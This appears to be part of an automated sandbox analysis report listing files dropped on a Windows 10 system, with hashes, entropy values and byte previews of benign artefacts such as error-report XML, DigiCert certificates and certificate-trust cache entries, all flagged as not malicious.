                                                                                                                                                                                                SSDEEP:192:R6l7wVeJbW6N6YcDySU9TYgmfEtKprN89bBmsf8Lm:R6lXJa6N6Y1SU9TYgmfEt9BFfd
                                                                                                                                                                                                MD5:01D8CCAB7A27A1B85A9E690F463F7DD8
                                                                                                                                                                                                SHA1:36094EF792A709C84A43018E5A4CF991C70F5D4C
                                                                                                                                                                                                SHA-256:BFE1F483EE55A952D04E7B37CBC5358E9AAC9129B1AD32442A4E14057740D104
                                                                                                                                                                                                SHA-512:AA945DE2EA129F73AE85C5F99B51F902677F3F8CE7CDDC6BCED950155094EEC615027698605FCC4210C2EEFFB55E2AA9507B7893C896AC9076F0B3A767618344
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.4.0.<./.P.i.
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):4593
                                                                                                                                                                                                Entropy (8bit):4.4790991886247005
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:cvIwWl8zsfJg77aI9BOWpW8VYLDYm8M4JQQLFK+q83s5LBwkexd:uIjfBI7Hv7V4WJQD55FVexd
                                                                                                                                                                                                MD5:C559AAAADCEBA62C591D506E51272CE2
                                                                                                                                                                                                SHA1:83CE3131B63BADD7AC7045E3059B1774D39FEA0B
                                                                                                                                                                                                SHA-256:56ABE82A10B68A68770B876AFC98117633AD6558C248E632C90411193D581877
                                                                                                                                                                                                SHA-512:1DA1F60B5893762C8EC93BF903F507ECE961AF6C0D0A3D61DBF3EA4177332D435EFBE6EDE09EFE83090C25DF0E6BA9404990AB4F53C115451C20E7F9BE220496
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="577918" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):81370
                                                                                                                                                                                                Entropy (8bit):3.074532452630099
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:q7hkocOgT3hs43MeYZN1hYH/+6YhnsbEidj17Ipq:q7hkocOgT3hs43MeYZN1hYH/+6UnsbEG
                                                                                                                                                                                                MD5:D9B8982930C6F29CDE5663D298561C39
                                                                                                                                                                                                SHA1:9BE3642A8A9A5EDB1348BD8DBE893D7B9A3BB910
                                                                                                                                                                                                SHA-256:B118D821DBA902B954055463D20703DED914003376B3E5533F0CE602174225A8
                                                                                                                                                                                                SHA-512:6FC0B5C88AEAA57AA7AC49B695B70BDB547EA693C5A12AF17568573F482A5723EEF88873FD7C981BFDF7237CBD50B6DD77EFD46AA8C70A6A3DB3AC781BFF3523
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                Entropy (8bit):2.68383291058236
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:TiZYW8T1FYM0aY8ceYwWIHsYEZ0ZtaiA3NPSKwYy2/ag5F2MKSoJIlN3:2ZD2olapceZWFag5F2MKSo2lN3
                                                                                                                                                                                                MD5:D4F1C7334ADB2145C16E2137FFFBAB0B
                                                                                                                                                                                                SHA1:7F5378A9F0E75BA66468840F8BA0B58002FE02DE
                                                                                                                                                                                                SHA-256:F80B7B868423F583A9381600E93391ECBA3A0EC23A22C440CF49A063112C599F
                                                                                                                                                                                                SHA-512:F6AC4209A71F08E14E2C8F4C77D8322A71B5AEA240C54A111A8B8A196BA281E33E3052318DEFF59272A0C7A8D082E461F60C4139FA48DE6AFD88B55FE5BFE2E9
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):71954
                                                                                                                                                                                                Entropy (8bit):7.996617769952133
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:Certificate, Version=3
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1716
                                                                                                                                                                                                Entropy (8bit):7.596259519827648
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):727
                                                                                                                                                                                                Entropy (8bit):7.591493461244967
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:5onfZGyc5RlRtBfQgyusAO+NEg3xO/MwGE2Mqyry/oUp2nWmyJQLYC0pH:5ikycdZNyuIJ/ZG7MqyryEnWNJQL8H
                                                                                                                                                                                                MD5:85E4EF53DAF9D74A4F483E3575E0182E
                                                                                                                                                                                                SHA1:706B05F30E9CA50CAA4D2AB06EEBDE684094F9F8
                                                                                                                                                                                                SHA-256:A155EDDD3FEFEB549E9A57DF0FE3910F7F66CF43E310DC81FC4A59E2E9529AF4
                                                                                                                                                                                                SHA-512:69E9854A575CE93964777B31CAEA6167A4291C57482BD342731BB02F04BE93450694A75C7BA019EAD54F38F25DFB96263111BA33A1DB57F77E25CF8EE681F007
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241106184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241106184215Z....20241113184215Z0...*.H.............|Q..V'.v..K..x.......i.f...&.!..........w9........./. ..G.7...NB..=..o..v...R...G.t!>..q.....d..V...C.*..3...l.+.9z.[....8.w..>......._..4D..X.(....oa...`K..U~.t./`I.p4..o.d\i$...Q......&.E.r,....kT..~R.w.Q..@.Bb...X.|....$I....gy6........p..f.ns.1..W{.;.....AldY.F.8I...3.K.D.!.@....2d#......LK..I.....|...#.p.....K?.....?..C.w..`...G.G.....7..zl....}...^ S.$..h..B5V..FI......T..p.*7.?..f.R5. P.*.[.|..S...^.....zK;.@.*X7.<~..X.8;..Q...t".K.yg..].+...0(.b{. 1.....'.^..q..6.PE;.....
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:Certificate, Version=3
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1428
                                                                                                                                                                                                Entropy (8bit):7.688784034406474
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):338
                                                                                                                                                                                                Entropy (8bit):3.443208365228831
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:kKPtK8tMiJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:NKkckPlE99SCQl2DUevat
                                                                                                                                                                                                MD5:9611F78304C5EBE03FEDC65FCE17D7A4
                                                                                                                                                                                                SHA1:F0401358A7069DE2950567A7A3D419D9A90A80DD
                                                                                                                                                                                                SHA-256:C81B0C558B618146A920C6E53EEF1193E9611C97A7688CA50A00F89DFA78DA66
                                                                                                                                                                                                SHA-512:6753825A21D694017A0D8FAB0C36CE586B39D6E1A23ABFB1827E7857CB814EC0EB5B4FD222FC9AF51017282F2E29E127961BAE26B0A3AE3DF3406CBFB9AD2B17
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:p...... .............3..(...............................................8...1.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                Entropy (8bit):3.1188894571028145
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:kKAEF9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:YdDnLNkPlE99SNxAhUe/3
                                                                                                                                                                                                MD5:019DF69AE73B0BD60B288E6218630568
                                                                                                                                                                                                SHA1:812A7008B37295D9E40CDBAE228B2EAF43DF7FA7
                                                                                                                                                                                                SHA-256:2AF0DBC8F275DADE9FBF7FC8981AF8E2191A1CE1934AEC8E4ECA2248BFEDB4C3
                                                                                                                                                                                                SHA-512:31B2DA8807D052210D1E051461F9D91316621D34A38C426A20C878FB85907FFB29AE439F86509968D6AE9B2F667244D1435276E5D51ED4548E2DF74AEE77E1DC
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:p...... ........je.c.1..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):308
                                                                                                                                                                                                Entropy (8bit):3.204200000804463
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:kKtLnzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:YtWOxSW0P3PeXJUZY
                                                                                                                                                                                                MD5:6474E5EE6634D032C1BC91EFFA03B47F
                                                                                                                                                                                                SHA1:68E93B36B6E16620F6DE4AAF5207A7FD2F768D18
                                                                                                                                                                                                SHA-256:0E87E72179C9FEE599B10A28A69AE969A443F00F1E566FCA0907590157C912B8
                                                                                                                                                                                                SHA-512:94523DBCA8C14899C6F61A1F10E6553713EE1152DAE234B2C5E10544EFC7BB01364073FE562F7B44BE31BC991483B4B3FAD6DB88FC3E495CDEEF7F55AF5E510E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:p...... ........Wo..1..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):412
                                                                                                                                                                                                Entropy (8bit):3.9719419467755217
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:kKZdUZbz1uz8p4yfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:xWzmJymxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                MD5:0D62B5A19BCF1353A50B9C8CA9994B6A
                                                                                                                                                                                                SHA1:BC1DA3F8F2A46963AEE94CEE7E8C202D4A94E32F
                                                                                                                                                                                                SHA-256:7178782FCF3B93E63A15CA5A75B859B52A06E7FDD022F4C2C83EF6874BF322CC
                                                                                                                                                                                                SHA-512:7C183754531B3D274181EFC327715ED80FFECED0FE248B58AEB65EF0D4592BE614D178E421B1456A92F6C802842559471CF42A9C5F41204C2A1E1D5B45F61AB5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:p...... ....(......\.1..(.................a.{0....F..5....................F..5.. ........w..11.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):254
                                                                                                                                                                                                Entropy (8bit):3.0450248512231974
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:kK1U1LDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:NU1LYS4tWOxSW0PAMsZp
                                                                                                                                                                                                MD5:53DF55DEEF48965C0A20CF48AADED84F
                                                                                                                                                                                                SHA1:E982C24D0BB604EEDDE284325B95BF3CCFEA2A29
                                                                                                                                                                                                SHA-256:76109E36CC8824B02D9EFD81D0548AF37849AE7E4946A2217EE043633E064225
                                                                                                                                                                                                SHA-512:0871C3D32821BEB6C569807589BC81ED9AF5DB4981952319158582BB9B15AF5338381EC50B357360B646318EE2E4B8A3CEBF7778B3AD9D8CFC3B545240D42D83
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:p...... ....l...Z2..1..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):25496
                                                                                                                                                                                                Entropy (8bit):5.0630161555157365
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:ilqh0BGo26tX9DkX9R/QPIBM7YV+++amtK/:isOD26tX9DkX9R/QPI+0V+++amtg
                                                                                                                                                                                                MD5:C133495EC09409322A4D6BEA63AC4E28
                                                                                                                                                                                                SHA1:EB1996090261CF8C03EDE329905F558FA5B91B7C
                                                                                                                                                                                                SHA-256:2552128168028EDEF6ED1D6095BA110E8A7174BD37B455BE90C173A0C3C3C73A
                                                                                                                                                                                                SHA-512:B870F883CA908C687CE00797280682E7D44F04E89C06EE1C9CCDB0824B4F5B3B1C6AA730B9A37DD88607833F943F0884C6995DDA5F283C09E28C3D57867F58C9
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:PcmH........o..7ibJ7f.......!...T...........................e...?....<.g..J.|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R...O.&r..VzU......3LD.SY...[s.T..<\...........`.......=...P...S...V...Z...].......,.......L.......T.......\.......`.......|...........................................@.......0...........<.......T.......h.......|...0.......................................0...........<.......T.......h.......|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):17866
                                                                                                                                                                                                Entropy (8bit):5.954687824833028
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                Malicious:false
